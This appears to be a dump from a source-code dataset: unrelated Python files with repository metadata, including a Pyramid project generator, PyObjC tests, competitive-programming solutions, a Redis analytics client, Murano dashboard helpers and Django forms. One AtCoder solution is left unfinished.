parser.add_argument(dest='template',
metavar='Project type',
help="Type of Pyramid project",
choices=['Starter', "Talk Python Entrepreneur's", 'SQLAlchemy', 'SubstanceD', 'ZODB'])
parser.add_argument('project_name',
metavar='Project name',
help="The user-visible name of your project")
parser.add_argument(
dest='template_language',
metavar='Template language',
widget='Dropdown',
choices=["jinja2", "chameleon", "mako"]
)
parser.add_argument(
dest="working_dir",
metavar='Output directory',
help='Directory for project',
widget="DirChooser")
sysargs = sys.argv[1:]
args = parser.parse_args(sysargs)
return args
def template_to_url(template_name: str) -> str:
if template_name == 'Starter':
return 'https://github.com/Pylons/pyramid-cookiecutter-starter'
elif template_name == 'SQLAlchemy':
return 'https://github.com/Pylons/pyramid-cookiecutter-alchemy'
elif template_name == 'SubstanceD':
return 'https://github.com/Pylons/substanced-cookiecutter'
elif template_name == "Talk Python Entrepreneur's":
return 'https://github.com/mikeckennedy/cookiecutter-pyramid-talk-python-starter'
else:
raise Exception("Unknown template type")
def build_app(info):
template = template_to_url(info.template)
proj_dir = cookiecutter.main.cookiecutter(
template,
no_input=True,
output_dir=info.working_dir,
extra_context={
'project_name': info.project_name,
'repo_name': to_project_style(info.project_name),
'template_language': info.template_language,
"project_slug": to_project_style(info.project_name),
"contact_name": "Company Name",
"domain_name": "yourcompany.com",
"contact_email": "[email protected]",
"description": "",
"integrations": "",
"mailchimp_api": "",
"mailchimp_list_id": "",
"outbound_smtp_username": "",
"outbound_smtp_password": "",
"outbound_smtp_server": "",
"outbound_smtp_port": "587",
"rollbar_access_token": ""
}
)
return proj_dir
if __name__ == '__main__':
sys.exit(main())
| [
"[email protected]"
] | |
411345c0f65612ba6ffbc7676affbf602610f570 | b639cc785f3e548c77090fb8d2bc35d5aebfa27c | /tests/test_patterns/test_des.py | 79d37243bb32adcaed183884512f9af4dcd4d33f | [] | no_license | jmcarp/neurotrends | 92b7c33a0fe7a216af4cbbb5d4d26f8ee051286e | 724c06f6a31ecfe37780b51038b3367cd501be37 | refs/heads/master | 2016-09-05T15:49:35.435697 | 2014-11-02T04:27:21 | 2014-11-02T04:27:21 | 6,889,235 | 6 | 3 | null | 2014-10-19T18:33:44 | 2012-11-27T19:15:19 | Python | UTF-8 | Python | false | false | 433 | py | # -*- coding: utf-8 -*-
import pytest
from neurotrends.pattern import des
from . import check_taggers
@pytest.mark.parametrize('input, expected', [
# Positives
('block design', {}),
('blocked paradigm', {}),
('epoch based', {}),
('epoched analysis', {}),
# PMID 21625502
('we used a blocked factorial design', {}),
])
def test_block(input, expected):
check_taggers([des.block], input, expected)
| [
"[email protected]"
] | |
50ed4c1e4c8f3a3d0004a7364916f829ebeb823e | e831c22c8834030c22c54b63034e655e395d4efe | /171-ExcelSheetColumnNumber.py | b0ecffe70dcf519041cda5b5ec7b971faf11ca34 | [] | no_license | szhmery/leetcode | a5eb1a393422b21f9fd4304b3bdc4a9db557858c | 9fcd1ec0686db45d24e2c52a7987d58c6ef545a0 | refs/heads/master | 2023-08-16T00:27:56.866626 | 2021-10-23T07:35:37 | 2021-10-23T07:35:37 | 331,875,151 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 394 | py | class Solution:
def titleToNumber(self, columnTitle: str) -> int:
ans = 0
for char in columnTitle:
num = ord(char) - ord('A') + 1
ans = ans * 26 + num
return ans
if __name__ == '__main__':
solution = Solution()
result = solution.titleToNumber("FXSHRXW")
print(result)
result = solution.titleToNumber("ZY")
print(result) | [
"[email protected]"
] | |
f4b2a1dbd9240673bd7048d07490b2712b5479ef | 4578b30c433510cf370d51475ec11cac9c3de1cb | /serpent/analytics_client.py | f7cc26e803be8a25bf0c6da550b983ec00c7ca18 | [
"MIT"
] | permissive | SerpentAI/SerpentAI | 0a5b2d567b50388722c3a3c5152555ce94256c49 | 00a487dd088c6ca2528d025f3273c0a796efe210 | refs/heads/dev | 2023-03-08T14:14:07.171435 | 2020-05-22T22:34:09 | 2020-05-22T22:34:09 | 88,444,621 | 7,216 | 950 | MIT | 2020-07-15T00:41:35 | 2017-04-16T21:48:39 | Python | UTF-8 | Python | false | false | 1,395 | py | from redis import StrictRedis
from datetime import datetime
from pprint import pprint
from serpent.config import config
import json
class AnalyticsClientError(BaseException):
pass
class AnalyticsClient:
def __init__(self, project_key=None):
if project_key is None:
raise AnalyticsClientError("'project_key' kwarg is expected...")
self.project_key = project_key
self.redis_client = StrictRedis(**config["redis"])
self.broadcast = config["analytics"].get("broadcast", False)
self.debug = config["analytics"].get("debug", False)
self.event_whitelist = config["analytics"].get("event_whitelist")
@property
def redis_key(self):
return f"SERPENT:{self.project_key}:EVENTS"
def track(self, event_key=None, data=None, timestamp=None, is_persistable=True):
if self.event_whitelist is None or event_key in self.event_whitelist:
event = {
"project_key": self.project_key,
"event_key": event_key,
"data": data,
"timestamp": timestamp if timestamp is not None else datetime.utcnow().isoformat(),
"is_persistable": is_persistable
}
if self.debug:
pprint(event)
if self.broadcast:
self.redis_client.lpush(self.redis_key, json.dumps(event))
| [
"[email protected]"
] | |
6f69f90944511a4dd09b85444b506dbc254f8afb | 8f8ac99fd3ed9ceb36778b404f6fdd0b6899d3f4 | /pyobjc-framework-Cocoa/PyObjCTest/test_nsattributedstring.py | b340f942563363e10e7fc3227d6dd2846b890741 | [
"MIT"
] | permissive | strogo/pyobjc | ac4201c7742eb75348328eeecb7eedf4e3458de3 | 2579c5eaf44b0c5af77ee195c417d2c65e72dfda | refs/heads/master | 2023-07-13T00:41:56.448005 | 2021-08-24T06:42:53 | 2021-08-24T06:42:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,273 | py | import objc
import Foundation
import AppKit
from PyObjCTools.TestSupport import TestCase, min_os_level
class TestNSAttributedString(TestCase):
def testMethodsFoundation(self):
self.assertArgIsOut(
AppKit.NSAttributedString.attributesAtIndex_effectiveRange_, 1
)
self.assertArgIsOut(
AppKit.NSAttributedString.attributesAtIndex_longestEffectiveRange_inRange_,
1,
)
self.assertArgIsOut(
AppKit.NSAttributedString.attribute_atIndex_longestEffectiveRange_inRange_,
2,
)
self.assertResultIsBOOL(AppKit.NSAttributedString.isEqualToAttributedString_)
def testConstantsAppKit(self):
self.assertIsInstance(AppKit.NSManagerDocumentAttribute, str)
self.assertIsInstance(AppKit.NSFontAttributeName, str)
self.assertIsInstance(AppKit.NSParagraphStyleAttributeName, str)
self.assertIsInstance(AppKit.NSForegroundColorAttributeName, str)
self.assertIsInstance(AppKit.NSUnderlineStyleAttributeName, str)
self.assertIsInstance(AppKit.NSSuperscriptAttributeName, str)
self.assertIsInstance(AppKit.NSBackgroundColorAttributeName, str)
self.assertIsInstance(AppKit.NSAttachmentAttributeName, str)
self.assertIsInstance(AppKit.NSLigatureAttributeName, str)
self.assertIsInstance(AppKit.NSBaselineOffsetAttributeName, str)
self.assertIsInstance(AppKit.NSKernAttributeName, str)
self.assertIsInstance(AppKit.NSLinkAttributeName, str)
self.assertIsInstance(AppKit.NSStrokeWidthAttributeName, str)
self.assertIsInstance(AppKit.NSStrokeColorAttributeName, str)
self.assertIsInstance(AppKit.NSUnderlineColorAttributeName, str)
self.assertIsInstance(AppKit.NSStrikethroughStyleAttributeName, str)
self.assertIsInstance(AppKit.NSStrikethroughColorAttributeName, str)
self.assertIsInstance(AppKit.NSShadowAttributeName, str)
self.assertIsInstance(AppKit.NSObliquenessAttributeName, str)
self.assertIsInstance(AppKit.NSExpansionAttributeName, str)
self.assertIsInstance(AppKit.NSCursorAttributeName, str)
self.assertIsInstance(AppKit.NSToolTipAttributeName, str)
self.assertIsInstance(AppKit.NSCharacterShapeAttributeName, str)
self.assertIsInstance(AppKit.NSGlyphInfoAttributeName, str)
self.assertIsInstance(AppKit.NSMarkedClauseSegmentAttributeName, str)
self.assertIsInstance(AppKit.NSSpellingStateAttributeName, str)
self.assertEqual(AppKit.NSUnderlineStyleNone, 0x00)
self.assertEqual(AppKit.NSUnderlineStyleSingle, 0x01)
self.assertEqual(AppKit.NSUnderlineStyleThick, 0x02)
self.assertEqual(AppKit.NSUnderlineStyleDouble, 0x09)
self.assertEqual(AppKit.NSUnderlinePatternSolid, 0x0000)
self.assertEqual(AppKit.NSUnderlinePatternDot, 0x0100)
self.assertEqual(AppKit.NSUnderlinePatternDash, 0x0200)
self.assertEqual(AppKit.NSUnderlinePatternDashDot, 0x0300)
self.assertEqual(AppKit.NSUnderlinePatternDashDotDot, 0x0400)
self.assertIsInstance(AppKit.NSUnderlineByWordMask, int)
self.assertEqual(AppKit.NSSpellingStateSpellingFlag, 1)
self.assertEqual(AppKit.NSSpellingStateGrammarFlag, 2)
self.assertIsInstance(AppKit.NSPlainTextDocumentType, str)
self.assertIsInstance(AppKit.NSRTFTextDocumentType, str)
self.assertIsInstance(AppKit.NSRTFDTextDocumentType, str)
self.assertIsInstance(AppKit.NSMacSimpleTextDocumentType, str)
self.assertIsInstance(AppKit.NSHTMLTextDocumentType, str)
self.assertIsInstance(AppKit.NSDocFormatTextDocumentType, str)
self.assertIsInstance(AppKit.NSWordMLTextDocumentType, str)
self.assertIsInstance(AppKit.NSWebArchiveTextDocumentType, str)
self.assertIsInstance(AppKit.NSOfficeOpenXMLTextDocumentType, str)
self.assertIsInstance(AppKit.NSOpenDocumentTextDocumentType, str)
self.assertIsInstance(AppKit.NSPaperSizeDocumentAttribute, str)
self.assertIsInstance(AppKit.NSLeftMarginDocumentAttribute, str)
self.assertIsInstance(AppKit.NSRightMarginDocumentAttribute, str)
self.assertIsInstance(AppKit.NSTopMarginDocumentAttribute, str)
self.assertIsInstance(AppKit.NSBottomMarginDocumentAttribute, str)
self.assertIsInstance(AppKit.NSViewSizeDocumentAttribute, str)
self.assertIsInstance(AppKit.NSViewZoomDocumentAttribute, str)
self.assertIsInstance(AppKit.NSViewModeDocumentAttribute, str)
self.assertIsInstance(AppKit.NSDocumentTypeDocumentAttribute, str)
self.assertIsInstance(AppKit.NSReadOnlyDocumentAttribute, str)
self.assertIsInstance(AppKit.NSConvertedDocumentAttribute, str)
self.assertIsInstance(AppKit.NSCocoaVersionDocumentAttribute, str)
self.assertIsInstance(AppKit.NSBackgroundColorDocumentAttribute, str)
self.assertIsInstance(AppKit.NSHyphenationFactorDocumentAttribute, str)
self.assertIsInstance(AppKit.NSDefaultTabIntervalDocumentAttribute, str)
self.assertIsInstance(AppKit.NSCharacterEncodingDocumentAttribute, str)
self.assertIsInstance(AppKit.NSTitleDocumentAttribute, str)
self.assertIsInstance(AppKit.NSCompanyDocumentAttribute, str)
self.assertIsInstance(AppKit.NSCopyrightDocumentAttribute, str)
self.assertIsInstance(AppKit.NSSubjectDocumentAttribute, str)
self.assertIsInstance(AppKit.NSAuthorDocumentAttribute, str)
self.assertIsInstance(AppKit.NSKeywordsDocumentAttribute, str)
self.assertIsInstance(AppKit.NSCommentDocumentAttribute, str)
self.assertIsInstance(AppKit.NSEditorDocumentAttribute, str)
self.assertIsInstance(AppKit.NSCreationTimeDocumentAttribute, str)
self.assertIsInstance(AppKit.NSModificationTimeDocumentAttribute, str)
self.assertIsInstance(AppKit.NSExcludedElementsDocumentAttribute, str)
self.assertIsInstance(AppKit.NSTextEncodingNameDocumentAttribute, str)
self.assertIsInstance(AppKit.NSPrefixSpacesDocumentAttribute, str)
self.assertIsInstance(AppKit.NSDocumentTypeDocumentOption, str)
self.assertIsInstance(AppKit.NSDefaultAttributesDocumentOption, str)
self.assertIsInstance(AppKit.NSCharacterEncodingDocumentOption, str)
self.assertIsInstance(AppKit.NSTextEncodingNameDocumentOption, str)
self.assertIsInstance(AppKit.NSBaseURLDocumentOption, str)
self.assertIsInstance(AppKit.NSTimeoutDocumentOption, str)
self.assertIsInstance(AppKit.NSWebPreferencesDocumentOption, str)
self.assertIsInstance(AppKit.NSWebResourceLoadDelegateDocumentOption, str)
self.assertIsInstance(AppKit.NSTextSizeMultiplierDocumentOption, str)
self.assertEqual(AppKit.NSNoUnderlineStyle, 0)
self.assertEqual(AppKit.NSSingleUnderlineStyle, 1)
self.assertIsInstance(AppKit.NSUnderlineStrikethroughMask, int)
def testMethodsAppKit(self):
self.assertResultIsBOOL(AppKit.NSAttributedString.containsAttachments)
self.assertArgIsBOOL(AppKit.NSAttributedString.nextWordFromIndex_forward_, 1)
self.assertArgIsOut(AppKit.NSAttributedString.URLAtIndex_effectiveRange_, 1)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithURL_options_documentAttributes_error_, 2
)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithURL_options_documentAttributes_error_, 3
)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithData_options_documentAttributes_error_, 2
)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithData_options_documentAttributes_error_, 3
)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithPath_documentAttributes_, 1
)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithURL_documentAttributes_, 1
)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithRTF_documentAttributes_, 1
)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithRTFD_documentAttributes_, 1
)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithHTML_documentAttributes_, 1
)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithHTML_options_documentAttributes_, 2
)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithHTML_baseURL_documentAttributes_, 2
)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithRTFDFileWrapper_documentAttributes_, 1
)
self.assertArgIsOut(
AppKit.NSAttributedString.dataFromRange_documentAttributes_error_, 2
)
self.assertArgIsOut(
AppKit.NSAttributedString.fileWrapperFromRange_documentAttributes_error_, 2
)
self.assertResultIsBOOL(
AppKit.NSMutableAttributedString.readFromURL_options_documentAttributes_error_
)
self.assertArgIsOut(
AppKit.NSMutableAttributedString.readFromURL_options_documentAttributes_error_,
2,
)
self.assertArgIsOut(
AppKit.NSMutableAttributedString.readFromURL_options_documentAttributes_error_,
3,
)
self.assertResultIsBOOL(
AppKit.NSMutableAttributedString.readFromData_options_documentAttributes_error_
)
self.assertArgIsOut(
AppKit.NSMutableAttributedString.readFromData_options_documentAttributes_error_,
2,
)
self.assertArgIsOut(
AppKit.NSMutableAttributedString.readFromData_options_documentAttributes_error_,
3,
)
self.assertResultIsBOOL(
AppKit.NSMutableAttributedString.readFromURL_options_documentAttributes_
)
self.assertArgIsOut(
AppKit.NSMutableAttributedString.readFromURL_options_documentAttributes_, 2
)
self.assertResultIsBOOL(
AppKit.NSMutableAttributedString.readFromData_options_documentAttributes_
)
self.assertArgIsOut(
AppKit.NSMutableAttributedString.readFromData_options_documentAttributes_, 2
)
@min_os_level("10.6")
def testConstants10_6(self):
self.assertEqual(AppKit.NSAttributedStringEnumerationReverse, 1 << 1)
self.assertEqual(
AppKit.NSAttributedStringEnumerationLongestEffectiveRangeNotRequired,
1 << 20,
)
self.assertIsInstance(AppKit.NSWritingDirectionAttributeName, str)
self.assertIsInstance(AppKit.NSFileTypeDocumentAttribute, str)
self.assertIsInstance(AppKit.NSCategoryDocumentAttribute, str)
self.assertIsInstance(AppKit.NSFileTypeDocumentOption, str)
@min_os_level("10.7")
def testConstants10_7(self):
self.assertIsInstance(AppKit.NSVerticalGlyphFormAttributeName, str)
self.assertIsInstance(AppKit.NSTextLayoutSectionOrientation, str)
self.assertIsInstance(AppKit.NSTextLayoutSectionRange, str)
self.assertIsInstance(AppKit.NSTextLayoutSectionsAttribute, str)
@min_os_level("10.8")
def testConstants10_8(self):
self.assertIsInstance(AppKit.NSTextAlternativesAttributeName, str)
self.assertIsInstance(AppKit.NSUsesScreenFontsDocumentAttribute, str)
@min_os_level("10.10")
def testConstants10_10(self):
self.assertIsInstance(AppKit.NSTextEffectAttributeName, str)
self.assertIsInstance(AppKit.NSTextEffectLetterpressStyle, str)
@min_os_level("12.0")
def test_constants12_0(self):
self.assertEqual(Foundation.NSInlinePresentationIntentEmphasized, 1 << 0)
self.assertEqual(
Foundation.NSInlinePresentationIntentStronglyEmphasized, 1 << 1
)
self.assertEqual(Foundation.NSInlinePresentationIntentCode, 1 << 2)
self.assertEqual(Foundation.NSInlinePresentationIntentStrikethrough, 1 << 5)
self.assertEqual(Foundation.NSInlinePresentationIntentSoftBreak, 1 << 6)
self.assertEqual(Foundation.NSInlinePresentationIntentLineBreak, 1 << 7)
self.assertEqual(Foundation.NSInlinePresentationIntentInlineHTML, 1 << 8)
self.assertEqual(Foundation.NSInlinePresentationIntentBlockHTML, 1 << 9)
self.assertIsInstance(Foundation.NSInlinePresentationIntentAttributeName, str)
self.assertIsInstance(Foundation.NSAlternateDescriptionAttributeName, str)
self.assertIsInstance(Foundation.NSImageURLAttributeName, str)
self.assertIsInstance(Foundation.NSLanguageIdentifierAttributeName, str)
self.assertEqual(
Foundation.NSAttributedStringMarkdownParsingFailureReturnError, 0
)
self.assertEqual(
Foundation.NSAttributedStringMarkdownParsingFailureReturnPartiallyParsedIfPossible,
1,
)
self.assertEqual(Foundation.NSAttributedStringMarkdownInterpretedSyntaxFull, 0)
self.assertEqual(
Foundation.NSAttributedStringMarkdownInterpretedSyntaxInlineOnly, 1
)
self.assertEqual(
Foundation.NSAttributedStringFormattingInsertArgumentAttributesWithoutMerging,
1 << 0,
)
self.assertEqual(
Foundation.NSAttributedStringFormattingApplyReplacementIndexAttribute,
1 << 1,
)
self.assertIsInstance(Foundation.NSReplacementIndexAttributeName, str)
self.assertIsInstance(Foundation.NSMorphologyAttributeName, str)
self.assertIsInstance(Foundation.NSInflectionRuleAttributeName, str)
self.assertIsInstance(Foundation.NSPresentationIntentAttributeName, str)
self.assertIsInstance(Foundation.NSInflectionAlternativeAttributeName, str)
self.assertEqual(Foundation.NSPresentationIntentKindParagraph, 0)
self.assertEqual(Foundation.NSPresentationIntentKindHeader, 1)
self.assertEqual(Foundation.NSPresentationIntentKindOrderedList, 2)
self.assertEqual(Foundation.NSPresentationIntentKindUnorderedList, 3)
self.assertEqual(Foundation.NSPresentationIntentKindListItem, 4)
self.assertEqual(Foundation.NSPresentationIntentKindCodeBlock, 5)
self.assertEqual(Foundation.NSPresentationIntentKindBlockQuote, 6)
self.assertEqual(Foundation.NSPresentationIntentKindThematicBreak, 7)
self.assertEqual(Foundation.NSPresentationIntentKindTable, 8)
self.assertEqual(Foundation.NSPresentationIntentKindTableHeaderRow, 9)
self.assertEqual(Foundation.NSPresentationIntentKindTableRow, 10)
self.assertEqual(Foundation.NSPresentationIntentKindTableCell, 11)
self.assertEqual(Foundation.NSPresentationIntentTableColumnAlignmentLeft, 0)
self.assertEqual(Foundation.NSPresentationIntentTableColumnAlignmentCenter, 1)
self.assertEqual(Foundation.NSPresentationIntentTableColumnAlignmentRight, 2)
@min_os_level("10.6")
def testMethods10_6(self):
self.assertArgHasType(
AppKit.NSAttributedString.enumerateAttributesInRange_options_usingBlock_,
0,
AppKit.NSRange.__typestr__,
)
self.assertArgIsBlock(
AppKit.NSAttributedString.enumerateAttributesInRange_options_usingBlock_,
2,
b"v@" + AppKit.NSRange.__typestr__ + b"o^" + objc._C_NSBOOL,
)
self.assertArgHasType(
AppKit.NSAttributedString.enumerateAttribute_inRange_options_usingBlock_,
1,
AppKit.NSRange.__typestr__,
)
self.assertArgIsBlock(
AppKit.NSAttributedString.enumerateAttribute_inRange_options_usingBlock_,
3,
b"v@" + AppKit.NSRange.__typestr__ + b"o^" + objc._C_NSBOOL,
)
@min_os_level("12.0")
def test_methods12_0(self):
self.assertResultIsBOOL(
Foundation.NSAttributedStringMarkdownParsingOptions.allowsExtendedAttributes
)
self.assertArgIsBOOL(
Foundation.NSAttributedStringMarkdownParsingOptions.setAllowsExtendedAttributes_,
0,
)
self.assertArgIsOut(
Foundation.NSAttributedString.initWithContentsOfMarkdownFileAtURL_options_baseURL_error_,
3,
)
self.assertArgIsOut(
Foundation.NSAttributedString.initWithMarkdown_options_baseURL_error_, 3
)
self.assertArgIsOut(
Foundation.NSAttributedString.initWithMarkdownString_options_baseURL_error_,
3,
)
self.assertArgIsPrintf(
Foundation.NSAttributedString.initWithFormat_options_locale_, 0
)
self.assertArgIsPrintf(
Foundation.NSAttributedString.localizedAttributedStringWithFormat_, 0
)
self.assertArgIsPrintf(
Foundation.NSAttributedString.localizedAttributedStringWithFormat_options_,
0,
)
self.assertArgIsPrintf(
Foundation.NSMutableAttributedString.appendLocalizedFormat_, 0
)
self.assertResultIsBOOL(
Foundation.NSPresentationIntent.isEquivalentToPresentationIntent_
)
| [
"[email protected]"
] | |
cdc62e0661ae30c80e83b7d35e680840195d3461 | 2929a5acbe52994cf2f961ed120374b7b330d074 | /form5/migrations/0008_auto_20200724_1433.py | 30b1610c3e20398521e7651d662281109a24371c | [] | no_license | orhunakar01/larasolar01 | a52135747676c587f6dfd98c67bf4c4a323dc448 | 18e12ecd5adc086da56b956a7f8da33f0723c84a | refs/heads/master | 2022-12-04T16:06:32.983099 | 2020-08-26T06:45:03 | 2020-08-26T06:45:03 | 290,418,075 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 434 | py | # Generated by Django 3.0.8 on 2020-07-24 11:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('form5', '0007_auto_20200724_1430'),
]
operations = [
migrations.AlterField(
model_name='form5',
name='dosya',
field=models.FileField(db_index=True, upload_to='', verbose_name='Fatura PDF Ekleyiniz.'),
),
]
| [
"[email protected]"
] | |
e8bd886a3bdc6cc1e1d74870cc517a83b8118279 | 51885da54b320351bfea42c7dd629f41985454cd | /abc198/e.py | 4bad4cd9760be8cf70992b7142d358622bb251b8 | [] | no_license | mskt4440/AtCoder | dd266247205faeda468f911bff279a792eef5113 | f22702e3932e129a13f0683e91e5cc1a0a99c8d5 | refs/heads/master | 2021-12-15T10:21:31.036601 | 2021-12-14T08:19:11 | 2021-12-14T08:19:11 | 185,161,276 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,109 | py | #
# abc198 e
#
import sys
from io import StringIO
import unittest
from collections import deque
class TestClass(unittest.TestCase):
def assertIO(self, input, output):
stdout, stdin = sys.stdout, sys.stdin
sys.stdout, sys.stdin = StringIO(), StringIO(input)
resolve()
sys.stdout.seek(0)
out = sys.stdout.read()[:-1]
sys.stdout, sys.stdin = stdout, stdin
self.assertEqual(out, output)
def test_入力例_1(self):
input = """6
2 7 1 8 2 8
1 2
3 6
3 2
4 3
2 5"""
output = """1
2
3
4
6"""
self.assertIO(input, output)
def test_入力例_2(self):
input = """10
3 1 4 1 5 9 2 6 5 3
1 2
2 3
3 4
4 5
5 6
6 7
7 8
8 9
9 10"""
output = """1
2
3
5
6
7
8"""
self.assertIO(input, output)
def resolve():
N = int(input())
C = list(map(int, input().split()))
AB = [list(map(int, input().split())) for _ in range(N-1)]
G = [[]*N for _ in range(N)]
for a, b in AB:
G[a-1].append(b-1)
G[b-1].append(a-1)
if __name__ == "__main__":
# unittest.main()
# resolve()
| [
"[email protected]"
] | |
eed9894019e05eca7b30267d37c17455147ae279 | 52a3beeb07ad326115084a47a9e698efbaec054b | /horizon/.venv/lib/python2.7/site-packages/muranodashboard_org/api/packages.py | 30555b0805e18d567b9299fc0c686cec216987c7 | [
"Apache-2.0"
] | permissive | bopopescu/sample_scripts | 3dade0710ecdc8f9251dc60164747830f8de6877 | f9edce63c0a4d636f672702153662bd77bfd400d | refs/heads/master | 2022-11-17T19:19:34.210886 | 2018-06-11T04:14:27 | 2018-06-11T04:14:27 | 282,088,840 | 0 | 0 | null | 2020-07-24T00:57:31 | 2020-07-24T00:57:31 | null | UTF-8 | Python | false | false | 3,859 | py | # Copyright (c) 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
from django.conf import settings
import yaml
from muranodashboard import api
from muranodashboard.common import cache
from muranodashboard.dynamic_ui import yaql_expression
def package_list(request, marker=None, filters=None, paginate=False,
page_size=20, sort_dir=None, limit=None):
limit = limit or getattr(settings, 'PACKAGES_LIMIT', 100)
filters = filters or {}
if paginate:
request_size = page_size + 1
else:
request_size = limit
if marker:
filters['marker'] = marker
if sort_dir:
filters['sort_dir'] = sort_dir
client = api.muranoclient(request)
packages_iter = client.packages.filter(limit=request_size,
**filters)
has_more_data = False
if paginate:
packages = list(itertools.islice(packages_iter, request_size))
if len(packages) > page_size:
packages.pop()
has_more_data = True
else:
packages = list(packages_iter)
return packages, has_more_data
def apps_that_inherit(request, fqn):
glare = getattr(settings, 'MURANO_USE_GLARE', False)
if not glare:
return []
apps = api.muranoclient(request).packages.filter(inherits=fqn)
return apps
def app_by_fqn(request, fqn, catalog=True):
apps = api.muranoclient(request).packages.filter(fqn=fqn, catalog=catalog)
try:
return apps.next()
except StopIteration:
return None
def make_loader_cls():
class Loader(yaml.Loader):
pass
def yaql_constructor(loader, node):
value = loader.construct_scalar(node)
return yaql_expression.YaqlExpression(value)
# workaround for PyYAML bug: http://pyyaml.org/ticket/221
resolvers = {}
for k, v in yaml.Loader.yaml_implicit_resolvers.items():
resolvers[k] = v[:]
Loader.yaml_implicit_resolvers = resolvers
Loader.add_constructor(u'!yaql', yaql_constructor)
Loader.add_implicit_resolver(
u'!yaql', yaql_expression.YaqlExpression, None)
return Loader
# Here are cached some data calls to api; note that not every package attribute
# getter should be cached - only immutable ones could be safely cached. E.g.,
# it would be a mistake to cache Application Name because it is mutable and can
# be changed in Manage -> Packages while cache is immutable (i.e. it
# its contents are obtained from the api only the first time).
@cache.with_cache('ui', 'ui.yaml')
def get_app_ui(request, app_id):
return api.muranoclient(request).packages.get_ui(app_id, make_loader_cls())
@cache.with_cache('logo', 'logo.png')
def get_app_logo(request, app_id):
return api.muranoclient(request).packages.get_logo(app_id)
@cache.with_cache('supplier_logo', 'supplier_logo.png')
def get_app_supplier_logo(request, app_id):
return api.muranoclient(request).packages.get_supplier_logo(app_id)
@cache.with_cache('package_fqn')
def get_app_fqn(request, app_id):
package = api.muranoclient(request).packages.get(app_id)
return package.fully_qualified_name
@cache.with_cache('package_name')
def get_service_name(request, app_id):
package = api.muranoclient(request).packages.get(app_id)
return package.name
| [
"[email protected]"
] | |
0f702ff15d1d5b9145082f6402c50e7a282d49a8 | 5b3d8b5c612c802fd846de63f86b57652d33f672 | /Python/eight_kyu/make_negative.py | 1ced2d2e37e6381d69e9df3fff51514a55f71b75 | [
"Apache-2.0"
] | permissive | Brokenshire/codewars-projects | 1e591b57ed910a567f6c0423beb194fa7f8f693e | db9cd09618b8a7085b0d53ad76f73f9e249b9396 | refs/heads/master | 2021-07-22T18:50:25.847592 | 2021-01-25T23:27:17 | 2021-01-25T23:27:17 | 228,114,677 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 724 | py | # Python solution for 'Return Negative' codewars question.
# Level: 8 kyu
# Tags: FUNDAMENTALS and NUMBERS.
# Author: Jack Brokenshire
# Date: 11/04/2020
import unittest
def make_negative(number):
"""
Make a given number negative.
:param number: an integer value.
:return: the integer as a negative number.
"""
return -abs(number)
class TestMakeNegative(unittest.TestCase):
"""Class to test make_negative function"""
def test_make_negative(self):
self.assertEqual(make_negative(42), -42)
self.assertEqual(make_negative(1), -1)
self.assertEqual(make_negative(-5), -5)
self.assertEqual(make_negative(0), 0)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
be5c1b5992e68428d06e14747e5ee74245b52472 | 58afefdde86346760bea40690b1675c6639c8b84 | /leetcode/elimination-game/365996335.py | a8932065ba6959fe4df1131bf0761ece4fd6de2d | [] | no_license | ausaki/data_structures_and_algorithms | aaa563f713cbab3c34a9465039d52b853f95548e | 4f5f5124534bd4423356a5f5572b8a39b7828d80 | refs/heads/master | 2021-06-21T10:44:44.549601 | 2021-04-06T11:30:21 | 2021-04-06T11:30:21 | 201,942,771 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 311 | py | # title: elimination-game
# detail: https://leetcode.com/submissions/detail/365996335/
# datetime: Mon Jul 13 18:50:53 2020
# runtime: 52 ms
# memory: 13.7 MB
class Solution:
def lastRemaining(self, n: int) -> int:
return (2 * (n // 2 - self.lastRemaining(n // 2) + 1)) if n > 1 else 1
| [
"[email protected]"
] | |
1dc16a63a83e65662628b2453ff91ff337eff28d | 3de21fc587c02f2702bd5770f11a31d5558a4666 | /django_ac22/apps/avisos/forms.py | f0f90b51cfdad481b5d8887b01638b45daf0f108 | [] | no_license | juanros13/ac22 | 8c20d59de62d596a73d6d7190f551ef3accf2b8e | d8ecf0686f3d8a57a747503b231b46277db71a6e | refs/heads/master | 2020-04-16T11:24:07.344404 | 2016-09-22T23:51:39 | 2016-09-22T23:51:39 | 65,859,654 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,110 | py | # -*- encoding: utf-8 -*-
from django import forms
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.contrib.auth.forms import UserCreationForm, AuthenticationForm
from django.contrib.auth import authenticate
from django.forms.widgets import Select, Textarea
from apps.avisos.models import Aviso, ComentarioAviso
class AvisoAddForm(forms.ModelForm):
titulo = forms.CharField(
widget=forms.TextInput(
attrs={
'class': 'form-control',
'placeholder' : 'Ingresa el titulo del aviso',
}
),
label = "Titulo del aviso",
)
class Meta:
model = Aviso
fields = ('tipo','titulo', 'contenido','mantener_al_principio')
widgets = {
'contenido': Textarea(
attrs={
'class': 'form-control',
}
),
}
class ComentarioAddForm(forms.ModelForm):
class Meta:
model = ComentarioAviso
